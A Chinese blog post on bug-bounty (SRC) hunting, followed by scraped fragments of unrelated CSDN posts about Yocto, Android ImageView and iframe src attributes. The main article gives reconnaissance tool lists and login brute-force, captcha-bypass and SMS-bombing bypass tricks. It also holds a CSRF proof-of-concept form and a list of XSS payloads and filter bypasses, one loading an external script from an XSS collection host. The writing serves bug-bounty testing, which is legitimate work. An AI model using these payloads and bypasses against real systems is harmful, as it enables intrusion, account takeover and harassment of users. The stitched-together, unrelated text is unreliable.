精华内容
下载资源
问答
  • SRC混子的漏洞挖掘之道

    千次阅读 2020-12-28 10:17:18
    一个SRC混子挖SRC的半年经验分享~,基本都是文字阐述,希望能给同样在挖洞的师傅们带来一点新收获。 前期信息收集 还是那句老话,渗透测试的本质是信息收集,对于没有0day的弱鸡选手来说,挖SRC感觉更像是对企业的...

    一个SRC混子挖SRC的半年经验分享~,基本都是文字阐述,希望能给同样在挖洞的师傅们带来一点新收获。

    前期信息收集

    还是那句老话,渗透测试的本质是信息收集,对于没有0day的弱鸡选手来说,挖SRC感觉更像是对企业的资产梳理,我们往往需要花很长的时间去做信息收集,收集与此公司相关的信息,包括企业的分公司,全资子公司,网站域名、手机app,微信小程序,企业专利品牌信息,企业邮箱,电话等等,对于很多万人挖的src来说,你收集到了别人没有收集过的资产,往往离挖到漏洞就不远了。

    企业相关信息收集

    • 企查查 (https://www.qcc.com)

    • 天眼查(https://www.tianyancha.com/)

    • 启信宝(https://www.qixin.com/)

      企查查、天眼查淘宝都有那种一天的会员。对于我们信息收集其实已经够用,个人更喜欢用企查查,因为它能一键导出域名,还可以直接查看企业关联的子公司,比较方便。

    主要查询的信息:

    1. 一般大的src都有许多子公司,企查查可以在所属集团中查看该集团下子公司,并且可以导出。

    2. 查看同电话企业基本都是子公司。

    3. 查看股份穿透图,一般来说控股超过50%的子公司的漏洞SRC收录的可能性都比较大。

    4. 查看企业下的app、小程序、还有品牌的资产,直接在搜索引擎里搜索品牌可能会有意想不到的收获。(找到一些平常收集不到的资产)

    PS:一般来说100%的全资子公司src漏洞是一定会收的,其他子公司资产可能需要与src审核沟通(扯皮)。

    • 站长之家:http://whois.chinaz.com/

      • 邮箱反查、注册人反查、电话反查。

      • 推荐个项目:https://github.com/code-scan/BroDomain 兄弟域名查询。

    • https://www.qimai.cn/

      • 七麦数据,可以查到企业下一些比较冷门的app。

    信息整理

    当我们通过各种手段对挖掘的企业进行信息收集后,我们大致能得到以下有用的信息

    • 主公司及分公司、子公司下所有归属的网站域名信息;

    • 主公司及分公司、子公司下所有的专利品牌和开发的一些独立系统。

    • 主公司及分公司、子公司下所有的app资产和微信小程序。

    之后我们需要对这些信息进行归纳和整理,比如哪些是该公司的主资产,哪些是边缘资产,哪些资产看上去比较冷门,我们是可以重点关注和进行深入挖掘的。

    子域名收集和网站信息收集

    子域名的话,对于我来说oneforall和xray的功能已经足够强大了,对于一些主域名来说,如果想要充分的收集子域名,最好用特大号字典进行最少三层的子域名爆破。这块还是layer子域名挖掘机不错。

    通过github收集子域名

    先分享一个姿势,很多时候github上已经有热心的师傅分享了自己跑出的子域名,所以可以先到github找一找有没有现成的可以白嫖,没啥好语法,纯靠大海捞针。。

    oneforAll

    https://github.com/shmilylty/OneForAll

    • 需要到配置文件里填写api接口信息,

    • 根据需求修改其他的配置,比如可以配置一些常见的端口,当做简单的端口扫描工具用。

    命令

    python oneforall.py --targets ./domain.txt run

    python oneforall.py --targets ./domain.txt --brute true run

    我实际操作发现在挂了外网代理和没挂代理时跑出来的子域有时候差的有点大,想收集的全一点的师傅可以不挂代理和挂代理都跑一遍。然后去重一下。

    xray

    子域名探测需要高级版,可以自己写个十几行的代码进行批量探测,也可以直接用这个项目里的代码,

    https://github.com/timwhitez/rad-xray 命令改一下能批量探测子域名,一般5到10分钟一个子域。

    Goby

    官网:https://gobies.org/

    因为之前一直在用masscan+nmap的方式进行端口扫描,用这个项目:https://github.com/hellogoldsnakeman/masnmapscan-V1.0

    前一段时间接触到goby,感觉可视化的工具用起来还是舒服,可以短时间对一些常见端口进行扫描,还能对网站进行指纹识别,报告看起来挺舒服的。

    因为在实际的端口扫描过程,由于cdn或者防火墙的原因,所以没必要一上来就全端口扫描,听一位师傅分享的经验,比如当扫描到22端口开放时,说明这个ip没有cdn保护,对于这种ip我们可以提取出来,然后重点进行全端口扫描,有收获的可能性会比较大。

    BBScan

    猪猪侠师傅写的工具,速度很快,简单的目录扫描,主要是可以探测C段下面的很多资产,扩充攻击面。

    项目地址:

    https://github.com/lijiejie/BBScan

    https://github.com/yhy0/BBScan (添加了springboot的泄露探测)

    • 可以对域名、ip、C段进行探测

    • 快速探测管理后台

    • 进行端口探测

    • 探测敏感信息泄露

    • 可以自定义扫描规则

    report下看报告,误报肯定会很多,但C段下很可能会有意想不到的资产。

    js信息收集

    主要是爬取网站的敏感js文件,js中能收集到的信息:

    • 增加攻击面(url、域名)

    • 敏感信息(密码、API密钥、加密方式)

    • 代码中的潜在危险函数操作

    • 具有已知漏洞的框架

    常用的工具

    速度很快的jsfinder https://github.com/Threezh1/JSFinder

    xray的rad爬虫 https://github.com/chaitin/rad

    能够匹配敏感信息的JSINFO-SCAN:https://github.com/p1g3/JSINFO-SCAN

    捡中低危漏洞的一些技巧

    刚开始挖src往往不知道从哪下手,首先我们其实可以从各个src平台提交漏洞下拉框里看一看收取的漏洞类型。然后针对性的去学习如何挖掘,比如某src收取的漏洞类型,我们就可以针对性的学习对应的挖掘技巧。

    框架注入

    明文密码传输

    表单破解漏洞

    IIS短文件名泄露

    老旧过期的HTTPS服务

    跨目录下载漏洞

    目录可浏览漏洞

    LFI本地文件包含漏洞

    RFI远程文件包含漏洞

    HTTP拒绝服务攻击

    弱口令登录

    CSRF跨站点请求伪造

    Flash点击劫持

    SQL注入漏洞

    XSS跨站脚本漏洞

    文件上传漏洞

    解析漏洞:IIS解析漏洞

    解析漏洞:Apache解析漏洞

    Cookies注入漏洞

    越权访问漏洞

    命令执行漏洞

    Struts2远程代码执行漏洞

    业务逻辑漏洞

    用户隐私泄露

    敏感信息泄漏(运维)

    敏感信息泄漏(研发)

    敏感文件泄漏(运维)(配置)

    敏感文件泄漏(运维)(权限)

    未验证的重定向和传递

    Flash跨域访问资源

    测试文件泄漏

    开启危险的HTTP方法

    HTTP参数污染

    Unicode编码绕过

    源码泄漏

    后台目录泄漏

    链接注入漏洞

    SSRF服务器请求伪造

    jsonp劫持

    学习完基础的漏洞类型后,我们可以多看一些实战的漏洞报告。比如wooyun漏洞库和hackone上的报告。

    • 乌云漏洞库:https://wooyun.x10sec.org/

    • hackone报告:https://pan.baidu.com/s/1jPUSuoERSIDw2zCKZ0xTjA 提取码:2klt

    这里列举一些我经常挖到的垃圾洞,生而为人,挖不到大洞,我很抱歉┭┮﹏┭┮。

    登录框处常见的一些漏洞

    在我们通过对目标的前期信息收集之后,首当其冲的往往就是各种奇奇怪怪的登录框,一般来说,大型的企业为了减少安全问题,一般都是用统一的登录接口登录不同的旗下网站,但是一些后台系统,运维系统,或者一些边缘业务使用了独立的注册、登录体系,这个时候往往就会存在安全问题。

    现在还能用的接码平台:

    • http://www.114sim.com/

    • https://yunduanxin.net/China-Phone-Number/

    • https://www.materialtools.com/

    绕过限制导致的爆破、撞库、用户遍历漏洞

    最常见的一种漏洞,尤其是一些老旧的后台系统,可能验证码抓个包就绕过去了。下面是一些常见的绕过姿势:

    • 验证码不刷新

    • 验证码抓包绕过

    • 验证码删除绕过

    • 验证码置空绕过

    • 修改xff头绕过:推荐个burp插件,https://github.com/TheKingOfDuck/burpFakeIP

    • 账号后加空格绕过账号错误次数限制。

    一般来说如果只是简单的验证码绕过,一般都是低危,所以一般能够绕过验证码的情况,都要尝试爆破一波账号密码。

    弱口令漏洞

    没有验证码或者验证码可以绕过的情况

    直接上一手字典爆破,当然还是有一些小技巧:

    • 比如可以设置固定的弱密码,比如123456,然后爆破账号。

    • 比如可以首先收集一些网站的信息针对性的制作字典,比如域名,员工邮箱,企业名称等等,推荐工具:白鹿社工字典生成:https://github.com/HongLuDianXue/BaiLu-SED-Tool

    爆破的关键在于字典,常见的字典github上都有,但是普通的弱口令现在确实不太好用了,要想提高成功的机率,还是需要碰一碰强密码,分享先知的文章:

    • https://xz.aliyun.com/t/7823

    • https://github.com/huyuanzhi2/password_brute_dictionary

    有验证码且无法绕过的情况

    • github直接找员工账号邮箱,密码。

    • 源码或者js文件查找线索,邮箱,或者加密的账号密码。

    • 特定系统或者cms,搜索引擎搜索默认管理员或者测试密码。

    • 手动尝试常见弱口令。

    注册、登录、找回密码处的短信\邮箱轰炸漏洞

    这个也挺常见的,一般可以对特定用户进行轰炸的是一定会收的,横向轰炸能够消耗资源的随缘收。常见的绕过姿势:

    • 加空格绕过

    • 加任意字母绕过

    • 前面加86绕过

    • xff头伪造ip绕过

    逻辑缺陷的导致的任意用户注册、登录、找回密码漏洞

    因为这方面漏洞一旦出现基本都是高危,所以挖掘的时候

    类似的思路我就不细说了,freebuf上有任意用户密码重置的系列文章,类似漏洞思路其实相差不大:

    https://www.freebuf.com/author/yangyangwithgnu

    常见的信息泄露漏洞

    敏感信息泄露的范围很广,我认为一般就是两大类,

    • 因为配置错误或者管理不当导致的企业内部信息泄露。

    • 因为逻辑缺陷导致的用户资料泄露(遍历)。

    github导致的信息泄露

    乌云上有一些案例,可以看一看。

    • P牛知识星球里分享的github搜索关键词:https://twitter.com/obheda12/status/1316513838716551169

    • github子域名监控项目:https://github.com/FeeiCN/GSIL

    • 常见的泄露内容:

      • 员工内部邮箱、登录账号、密码。

      • 企业的一些内部系统域名、ip泄露。

      • 企业网站的工程代码、网站源码泄露,可以通过员工邮箱关键词查找,要注意日期,好几年的大概率不收了。

    配置错误导致的信息泄露

    包含的类型很多,最重要的是有一份足够强大的字典和一个好用的扫描器。

    我在实际进行探测的时候,对于大批量的域名来说,更喜欢先用一份精简的小字典先进行快速扫描

    比如:

    • 备份文件的小字典

    • springboot泄露的小字典

    • 网站后台的小字典

    比较出名的扫描器我们常见的dirsearch、dirmap,dirbuster等等。

    可视化的比如TEST404系列、御剑扫描器使用体验也不错。

    注:信息泄露中比较常见的swagger-ui服务泄露,可能直接提交会忽略或者低危,别忘了进一步测试泄露的接口功能。

    越权导致的信息泄露

    很多时候越权来来去去都是更改一个参数的问题,更多的时候还是要细心的一个一个测业务功能,注意观察和测试操作参数和对象参数,操作参数一般是增删改查对应特定业务的敏感操作、对象参数一般是用户或者物品等。

    推荐几个burp插件:

    • 未授权检测: https://github.com/theLSA/burp-unauth-checker

    • 敏感参数提取:https://github.com/theLSA/burp-sensitive-param-extractor

    • 信息提取:https://github.com/theLSA/burp-info-extractor

    插件的作用基本还是帮助我们快速定位敏感参数,实际测试还是需要我们一个包一个包仔细的分析程序逻辑。

    常见的一些越权情况:

    • 基于用户ID的越权

    • 基于功能对象ID的越权

    • 基于上传对象ID的越权

    • 基于未授权访问的越权

    • 基于功能地址的越权

    • 基于接口身份的越权

    其他的OWASPTop10漏洞

    CSRF漏洞

    CSRF漏洞在挖掘中最重要的是说明危害,比较容易扯皮,一般来说涉及用户资料、财产、权限的CSRF漏洞大概率会收,一般来说最高就是中危。捡捡垃圾洞还是可以的。

    常见的漏洞点

    1、修改个人资料、邮箱、密码、头像

    2、发表文章

    3、添加、删除评论

    4、添加、修改、删除收货地址

    5、添加管理员

    (1) GET型

    GET类型的CSRF利用非常简单,只需要一个HTTP请求,所以,一般会这样利用:

    • <img src=http://www.xxxxx.com/csrf?xx=11 />

    (2) POST型

    POST请求中没有token参数,然后请求也没有验证referer信息。这种是存在CSRF情况最多的一种。这种漏洞的检测方法也很简单,网页操作某功能,抓包后,如果发现没有token等参数,然后就将referer信息设置为空,再次发包请求,如果请求成功了,就说明这里有CSRF漏洞。

    poc(可以用burp自己生成的):

    <html>

    <body>

    <form name="px" method="post" action="http://www.xxxxx.com/add">

    <input type="text" name="user_id" value="1111">

    </form>

    <script>document.px.submit(); </script>

    </body>

    </html>

    POST请求数据为json,当服务器没有严格校验content-type类型时,POC为:

    <script>

    var xhr = new XMLHttpRequest();

    xhr.open("POST", "http://www.xxxx.com/api/setrole");

    xhr.withCredentials = true;

    xhr.setRequestHeader("Content-Type", "text/plain;charset=UTF-8"); xhr.send('{"role":admin}');

    </script>

    3. Flash 型

    Flash CSRF通常是由于Crossdomain.xml文件配置不当造成的,利用方法是使用swf来发起跨站请求伪造。

    利用条件:

    1、目标站点下必须存在crossdomain.xml文件。

    2、crossdomain.xml中的配置允许其他域进行跨域请求。

    <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-policy>

    bypass小技巧

    • 删除csrf token

    • 置空csrf token

    • 修改请求方法,如POST方法变GET请求

    • 使用与token相同长度的任意字符串替换token,例如尝试更改一个字符,看看或发生什么

    • 使用固定token

    • token字段改成 token[]=

    任意文件上传漏洞

    这个洞遇到的也比较多,一般来说是后端没有限制上传文件的类型。但是上传的脚本文件也不会解析。也就没有办法getshell。(很多SRC对于上传到cdn云服务器的任意文件上传是忽略的)。

    • 上传含有xss代码的html文件,造成存储型xss(如果上传到了cdn服务器之类的大概率忽略)。

    • 上传恶意文件进行钓鱼

    • 尝试在上传的文件名前加../进行目录穿越。

    • 可以结合其他漏洞比如CORS漏洞扩大危害。

    文件上传的常见的绕过姿势应该也挺熟悉的了。。,实际测试的时候发现在进行申请企业、个人认证的时候,上传文件处常常有这个问题。

    XSS漏洞

     

    老熟人了,不多说了,常见的姿势大家应该都知道。分享一个我学XSS的文章:

    https://wizardforcel.gitbooks.io/xss-naxienian/content/index.html

     

    Broken5师傅的xsspayload:

    <script>alert(1)</script>

    <script src=https://xsspt.com/VBAhTu></script>

    <a href=javascript:alert(1)>xss</a>

    <svg οnlοad=alert(1)>

    <img src=1 οnerrοr=alert(1)>

    <img src=https://www.baidu.com/img/bd_logo1.png οnlοad=alert(1)>

    <details open οntοggle=alert(1)>

    <body οnlοad=alert(1)>

    <M οnmοuseοver=alert(1)>M

    <iframe src=javascript:alert(1)></iframe>

    <iframe οnlοad=alert(1)>

    <input type="submit" οnfοcus=alert(1)>

    <input type="submit" οnclick=alert(1)>

    <form><input type="submit" formaction=javascript:alert(1)>

    bypass姿势

    <!-- 空格被过滤 -->

    <img/src="1"/οnerrοr=alert(1)>

    <!-- 双写绕过 -->

    <iimgmg src=1 oonerrornerror=aimglert(1)>

    <!-- 大小写绕过 -->

    <iMg src=1 oNerRor=alert(1)>

    <!-- 利用eval() -->

    <img src=1 οnerrοr="a=`aler`;b=`t(1)`;eval(a+b);">

    <img src=1 οnerrοr=eval(atob('YWxlcnQoMSk='))>

    <!-- 利用location -->

    <img src=1 οnerrοr=location='javascript:%61%6C%65%72%74%28%31%29'>

    <img src=1 οnerrοr=location='javascript:\x61\x6C\x65\x72\x74\x28\x31\x29'>

    <img src=1 οnerrοr=location="javascr"+"ipt:"+"%61%6C%65%72%74%28%31%29">

    <!-- 括号被过滤 -->

    <img src=1 οnerrοr="window.οnerrοr=eval;throw'=alert\x281\x29';">

    <!-- οnerrοr=被过滤 -->

    <img src=1 onerror =alert(1)>

    <img src=1 onerror

    =alert(1)>

    <!-- 属性被转换为大写 -->

    <img src=1 οnerrοr=alert(1)>

    <!-- 编码后被检测 -->

    <img src=1 οnerrοr=alert(1)>

    威胁情报的提交

    这块我也没有经验,给大家分享两篇文章吧。。。信息收集到了还是可以试试提交的

    https://mp.weixin.qq.com/s/v2MRx7qs70lpnW9n-mJ7_Q

    https://bbs.ichunqiu.com/article-921-1.html

    可以试一试加一加各种羊毛群,反手撸一手羊毛群的羊毛。

    对于挖掘高危、严重级别漏洞的一些思考

    因为一直以来挖到高危、严重的数量寥寥无几,基本上就是一直在捡一些中低危漏洞,这段时间也看了很多牛叉的漏洞报告,想聊一聊我的思考。

    1.自动化信息收集的能力

    这里说的信息收集更多的是如何利用已有的工具进行快速自动化的收集和整理,既要做到速度快,还要做到全面收集不遗漏信息,很多时候这个过程本身就是在发现漏洞。

    这些工作应该在我们前期信息收集的阶段就应该全面的完成,所以如何快速化的进行全面的信息收集是我们需要思考和不断实践的。

    2.打漏洞组合拳的能力

    SRC对于漏洞评级主要是看你漏洞可以造成的危害,所以当挖到一些低危漏洞时,可以先不急着提交,找一找有没有其他可以利用的点打漏洞组合拳。

    3.绕waf的能力

    这个能力挺欠缺的。挖洞的过程基本遇到waf就溜了,尤其是一些大厂的waf,绕其他waf就是直接嫖一些其他的师傅的思路。

    4.细心和耐心和一些运气

    心细挖天下,再加上一些运气,可能高危严重就到手了。

    总结

    挖SRC需要有一个好心态,国内SRC生态并不是很好,SRC感觉更多的提供了一个相对安全的测试保障,所以更需要抱着一种学习的心态去挖,将我们学习的到的知识灵活运用,发现新的问题。不要想我今晚一定要挖到多少漏洞,要拿到多少奖金,不然可能会被忽略三连打崩心态。

     

    禁止非法,后果自负

    欢迎关注公众号:web安全工具库

     

    展开全文
  • 目录SRC_URI变量SRC_DIR应用场景 返回总目录:Yocto开发讲解系列 - 总目录 SRC_URI变量 该变量在bb文件中用于获取本地或者远程源代码,构建过程do_fetch通过该变量获取源码。SRC_URI可以指定多个源码或者文件,是一...

    By: fulinux
    E-mail: fulinux@sina.com
    Blog: https://blog.csdn.net/fulinus
    喜欢的盆友欢迎订阅!
    你的喜欢就是我写作的动力!

    返回总目录Yocto开发讲解系列 - 总目录

    SRC_URI变量

    该变量在bb文件中用于获取本地或者远程源代码,构建过程do_fetch通过该变量获取源码。SRC_URI可以指定多个源码或者文件,是一个文件列表。

    SRC_DIR

    这个变量可以用来指定实际构建过程中源码的目录位置。

    应用场景

    我们假设有这样一个应用场景:

    tree abcdir/
    	configure.ac
    	Makefile.am
    	abc.c
    	abc.h
    	xyzdir/
    		configure.ac
    		Makefile.am
    		xyz.c
    		xyz.h	
    

    在上面的本地

    展开全文
  • 绝对干货!src漏洞挖掘经验分享

    千次阅读 2021-07-16 12:48:27
    公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。 在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,...

    公粽号:黒掌

    一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主!

    src漏洞挖掘经验分享 – 掌控安全以恒

    一、公益src

    公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。

    在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。(其他的漏洞在挖掘src的时候没有遇到所以无法给出更多的建议,望见谅)

    以上就是src的部分内容。(刚参加src活动的同学可以了解了解)

    二,一般寻找的漏洞(或者是在冲分时建议多寻找的漏洞种类)

    如果我们想要冲榜那么必然需要很多的漏洞,因为大部分情况下我们挖的厂商高危漏洞只有4分(小型企业等),可是如果我们提升挖掘的速度就可以弥补这一不足。因此在下面我会介绍我建议挖掘的漏洞以及验证漏洞存在的方法和工具的使用。

    1.SQL注入

    SQL注入一般情况下会被评为高危漏洞,但是也有某些厂商很小的情况或者是很难利用的情况会被评为中危漏洞,因此尝试挖掘SQL注入对于冲榜来说意义很大
    SQL注入的验证一般是在id 传参后构造 and 1=1 或者是 and 1=2 看页面的返回情况来判断是否存在SQL注入,如果存在那么首先测试显错注入其次在尝试其他类型的注入,或者是直接使用sqlmap跑在得出数据库名即可提交。但是也有部分情况是使用sqlmap跑不出库名或者是表名因此需要手注
    对于挖掘SQL注入我们一般是使用sqlmap先跑取注入类型再跑取数据库名,或者是在access等数据库没有库名的情况下直接跑取表名
    

    sqlmap效果图如下

    img



    img

    sqlmap部分命令如下

    python sqlmap -u xxx --dbs 跑取库名获取库名后一般就可以提交了`
    `python sqlmap -u xxx --tables access等数据库没有库名的情况下跑取表名`
    `python sqlamp -u xxx --delay=1 防止访问过快被ban ip 可尝试使用的指令
    

    关于SQL注入的其他内容

    真实站点的SQL注入漏洞和我们学院的靶场其实差别并不是很大,除了可能存在防火墙 以及ip 会ban (禁)之外 其他的部分差别不大 在文章的最后我会放一些我挖掘到的SQL注入的效果图
    

    2.xss

    xss一般情况下有3种 DOM 反射型 存储型,在我挖掘src的时候只挖到过反射型的xss,其他的两种没有遇到过因此下面的内容我只能分享一些反射型xss的经验。

    反射型 xss漏洞一般情况下会被划分为低危漏洞可以加到2分,因此我们在挖掘时只有获取大量的xss漏洞才能满足我们的冲榜需求,但是含有xss注入的站点寻找起来有一点困难因此我建议在测试SQL注入站点的时候顺便测一下xss
    

    `测试xss一般是构造js弹窗语句在表单框内打上xss代码或者是在url栏中的id传参后面构造xss代码查看页面是否弹窗,但是有一点比较麻烦就是js弹窗语句多种多样因此我们需要用很多时间来构造语句此时可以借助某些工具来达到效果(在后面会再聊工具)

    xss效果图

    img



    img

    3.信息泄露

    这种类型的漏洞在我挖掘时遇到最多的是可以直接访问phpinfo 的信息,其他的就是可以下载到一份含有敏感信息的文件,我在挖掘漏洞的时候对这类漏洞并没有专门的寻找只是在测试SQL注入漏洞的时候随手测试了一下,因此我把具体的过程放到后面的工具讲解部分。

    三、利用工具

    工具最常见的应该是爬虫器 扫描器 等 。利用爬虫我们可以找到一些站点而利用扫描器我们可以对站点进行漏洞扫描从而获取漏洞信息。下面我介绍我在挖掘漏洞时最常用的两种工具。

    1.爬虫工具

    利用爬虫工具我们可以找到一些站点该站点可能存在某些漏洞,也可能是某些我们在利用谷歌语法寻找站点时没有找到的站。

    注入点批量搜集工具

    img

    利用该工具在内容中填入谷歌语法可以搜索url栏中存在的某些关键字例如:inurl:php?id= 利用该工具我们可以找到一些站点然后在对他进行测试尝试寻找SQL注入 xss等漏洞

    2.扫描工具

    我用的比较多的是长亭科技的xray 利用它可以对某些站点进行漏洞扫描可以获取漏洞信息,假如我们已经通过构造传参得出了一个站点存在SQL注入 漏洞那么我们就可以再利用扫描器对站点进行扫描获取其他的漏洞信息。

    img

    四、如何寻找站点

    当我们在进行src漏洞挖掘时寻找站点是非常重要的一点此时知道如何寻找站点对于冲榜至关重要,在此我分享一下我在挖掘漏洞时是怎样寻找漏洞的。

    首先就是利用谷歌语法在谷歌镜像站或者是必应等支持谷歌语法的搜索引擎中进行搜索,假如我们在挖掘SQL注入 那么我们可以构造 inurl:php?id= 来寻找漏洞,还可以根据某些企业的行业词例如 能源,制药等词语再利用谷歌语法寻找站点。那么行业名词在漏洞盒子的栏目中都有可以自行更改。

    img

    其次就是利用爬虫工具批量搜索站点就像是注入点批量搜集工具 我们也可以在内容框中构造谷歌语法信息 如 inurl:php?id= 以及变更行业内容例如 制药 建筑等

    img

    利用该工具我们可以找到某些存在SQL注入的站点但是也有些情况是不存在SQL注入的是工具误报。

    以上寻找站点的方式只是我个人的方法在社区里面还有很多的大佬有着他们的方式各位同学也可以向他们多学习。

    五、个人感受

    src是一个锻炼自己的过程学院举办这个活动我个人觉得非常的好,意义也是非常的大。真实站点和学院的靶场在某些情概况下是差不多得但是也有某些情况是不一样的比如说我在挖掘第一个真实站点的漏洞时利用sqlmap跑取数据库名字,结果跑取不出并且也无法访问站点,直到后来我去询问聂风老师时才知道是因为ip 被ban 。而除了这一点还有一些其他的地方不太一样,但是对我们的漏洞挖掘经验也是有着很大的帮助。

    src的存在对于像我这样的小白来说很重要,可以得到一些真实站点的漏洞挖掘经验。在我刚参加src时有大佬说src技术含量低但是经过了一个月的漏洞挖掘我觉得src是一个可以获取经验的平台很适合刚刚学完课程或者是第一次参加的同学。

    最后呢我想分享一下现在的感受,当我挖完src也努力的上了一个榜,但是现在我还是觉得自己在很多的方面需要学习,因此我建议各位同学在挖完src后依旧需要保持着努力学习新知识的心态,然后经常去我们的社区以及其他的论坛逛一逛学学新的知识!!!

    SQL注入 站点图

    img



    img



    img



    img

    来源:hk以恒

    活码3D(缩小)

    今天的分享就到这里,喜欢的小伙伴记得点赞收藏转发,我有一个公粽号【黒掌】, 里面分享了更多黑客秘籍,欢迎来耍!

    展开全文
  • 设置ImageView的src:image.setImageDrawable(getResources().getDrawable(R.drawable.blackk));String path=Environment.getExternalStorageDirectory()+File.separator+”test.jpg”;Bitmap bm = BitmapFactory....

    设置ImageView的src:

    image.setImageDrawable(getResources().getDrawable(R.drawable.blackk));

    String path=Environment.getExternalStorageDirectory()+File.separator+”test.jpg”;

    Bitmap bm = BitmapFactory.decodeFile(path);

    image.setImageBitmap(bm);

    image.setImageResource(R.drawable.blackk);

    设置ImageView的background:

    image.setBackground(getResources().getDrawable(R.drawable.blackk));

    image.setBackgroundResource(R.drawable.blackk);

    image.setBackgroundDrawable(getResources().getDrawable(R.drawable.blackk));

    android 代码里设置控件属性

    设置字体大小: setTextSize(TypedValue.COMPLEX_UNIT_PX,22); //22像素 setTextSize(TypedValue.COMPLEX_UNIT_SP,22 ...

    Android代码中设置字体大小,字体颜色,显示两种颜色&period;倒计时效果

    Android代码中设置字体大小,字体颜色,显示两种颜色 在xml文件中字体大小用的像素

    ImageView的src和background的区别

    参考资料: http://blog.csdn.net/dalleny/article/details/14048375 http://www.android100.org/html/201508/27 ...

    ImageView的src与background及ScaleType

    1 概述 开发中经常使用Imageview的src和background属性,从字面上看src是路径,background是背景.二者都可以显示drawable或者颜色.设置drawable图片资源时 ...

    Android开发 从代码里设置Drawable图片不显示的问题

    问题描述 我们从代码里获得Drawable在设置给View时会发现,图片不显示的问题.比如如下代码: Drawable drawable = getResources().getDrawable(R. ...

    【android】ImageView的src和background的区别以及两者的妙用

    一.ImageView中XML属性src和background的区别: background会根据ImageView组件给定的长宽进行拉伸,而src就存放的是原图的大小,不会进行拉伸 .src是图片内 ...

    【android】ImageView的src和background以及两者之间的神奇的差异

    一.ImageView中XML属性src和background的差别: background会依据ImageView组件给定的长宽进行拉伸.而src就存放的是原图的大小,不会进行拉伸.src是图片内容 ...

    Android代码中设置背景图片

    //设置背景图片        String picfile= Environment.getExternalStorageDirectory() + "/pdp/pdp.png" ...

    转--Android如何在java代码中设置margin

    ========  3 在Java代码里设置button的margin(外边距)? 1.获取按钮的LayoutParams LinearLayout.LayoutParams layoutParams ...

    随机推荐

    Framework4&period;5语法糖 异步Task

    1.线程安全 在使用TaskRun的时候需要注意线程安全的问题. 线程安全通常是由全局变量及静态变量引起的,如果是值类型就不存在这样的隐患,如果是引用类型用不好就会导致线程不安全! 2.Task.Ta ...

    Bootstrap源码分析之transition、affix

    一.Transition(过滤) 作为一个基础支持的组件,被其他组件多次引用.实现根据浏览器支持transition的能力,然后绑定动画的结束事件:首先:创建一个Element:然后:迭代查看此元素支 ...

    Abstract Factory模式的几个要点

    1.如果没有应对“多系列对象构建”的需求变化,则没有必要使用Abstract Factory模式.这时候使用简单的静态工厂完全可以.2.“系列对象”指的是这些对象之间有相互依赖.或作用的关系3.Abs ...

    console&period;log

    其实,console.log 不仅仅有一下应用 console.log() 这个应该是最常用的 console.error() 输出错误信息 会以红色显示 console.assert(bool,”i ...

    Druid密码加密

    pom里引用: com.alibabadruid-spring ...

    rsync&plus;inotify实现全网自动化数据备份-技术流ken

    rsync简介 “rsync是linux系统下的数据镜像备份工具.使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他SSH.rsync主机同步” rsync的功能和特点 ...

    Netty实战九之单元测试

    ChannelHandler是Netty应用程序的关键元素,所以彻底地测试他们应该是你的开发过程的一个标准部分.最佳实践要求你的测试不仅要能够证明你的实现是正确的,而且还要能够很容易地隔离那些因修改代 ...

    abp中linq的应用

    private IQueryable SelectOrScrrenMember(GetMemberInput input) { string[] use ...

    idea中svn的使用教程

    引言:以下是idea集成小乌龟后的svn使用教程,一张图足以说明问题,后续如果遇到了比较复杂一点的问题再来补充. 参考文档:https://blog.csdn.net/liuhailiuhai12/a ...

    展开全文
  • 前言 时隔11个月补充了一下这篇文章,很久之前就写过了,一直没发出来,可能整个文章就和水文...补天漏洞响应平台旨在建立企业与白帽子之间的桥梁,帮助企业建立SRC(安全应急响应中心),让企业更安全,让白帽子获益。 ...
  • src挖掘】fofa联动xray批量刷src

    千次阅读 2021-02-16 15:08:52
    目录1、利用fofa API收集目标2、使用xray批量验证 1、利用fofa API收集目标 需要安装python2 # -*- coding: utf-8 -*- import time import urllib2 import fofa import json def write_url(urls): ...
  • iframe标签的src属性

    2021-06-14 06:34:11
    jQuery怎么给iframe的src赋值给iframe src赋值,代码如下: 特别注意: 1.上述jquery代码不能缺少 $(document).ready(); ,否则iframe src赋值失败。关于HTML标签IFRAME,IMG等的src属性。我在IMG的SRC里写了E://新建...
  • HTML audio src 属性

    2021-06-14 07:27:53
    尝试一下 »浏览器支持Internet Explorer 9+, Firefox, Opera, Chrome, 和 Safari 浏览器都支持 src 属性。。但是不是有的浏览器都支持音频的文件格式。注意: Internet Explorer 8 及更早 IE 版本不支持 标签。定义...
  • 填充在IMG SRC随机数

    2021-07-01 19:36:47
    你可以用一个时间戳取代“INSERT_CACHEBUSTER”,像这样:var img = document.querySelector('img[src*="INSERT_CACHEBUSTER"]')img.src = img.src.replace('INSERT_CACHEBUSTER', (new Date()).getTime())时间戳的...
  • 获取src的根目录

    2021-06-24 04:41:39
    一开始在eclipse中的src目录下建了一个resource目录,在里面建了一个config.properties文件,然后在main方法中读取config.properties文件,路径是:String path = “src/config.properties”;,程序一切OK。然而,...
  • HTML src路径的用法

    千次阅读 2021-06-09 11:31:33
    绝对路径 我通过将 src=“f.jpg”改为 src=“/f.jpg”,问题解决了。这种写法的意思是告诉浏览器,在我当前的站点名下,访问此地址,那么就是:http://localhost/f.jpg。 3. 跨站点绝对路径 本文链接:...
  • 今天某个同事遇到一个诡异的问题,问题描述如下:需求:通过脚本动态修改script标签的src来载入一段外部脚本并执行实现方式(#1):document.getElementById('external-script').src='url2';url2的内容如下:alert('I ...
  • HTML DOM IFrame的src...iframeObject.src它用于设置src属性。iframeObject.src = URL属性值:它包含一个单值URL,该URL指定嵌入到iframe中的文档的URL。下面列出了两种类型的URL链接:Absolute URL:它指向另一个...
  • java项目中读取src目录下的文件

